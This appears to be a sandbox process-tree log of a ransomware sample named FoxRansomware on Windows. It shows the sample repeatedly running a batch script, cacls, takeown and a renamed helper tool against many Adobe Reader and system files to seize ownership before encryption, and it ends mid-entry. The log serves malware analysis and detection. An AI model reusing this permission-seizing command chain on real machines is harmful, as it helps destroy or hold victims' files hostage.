- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:4564
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:5112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:4528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:3352
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:5052
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:4232
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:1436
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:3796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:4884
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    - Modifies file permissions
    PID:2128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:4028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:832
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    - Modifies file permissions
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:2892
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:2348
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:3400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:2600
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:2356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:1348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "license.html" -nobanner
    3⤵
    PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "license.html" -nobanner
      4⤵
      PID:2588
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3064
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    - Modifies file permissions
    PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:4064
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:2568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    - Modifies file permissions
    PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:3664
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:3924
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:2460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:2456
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:2656
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:2248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:3128
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:2084
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:3988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:3356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:2628
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:3296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:2092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:3284
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:3632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4136
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\takeown.exe
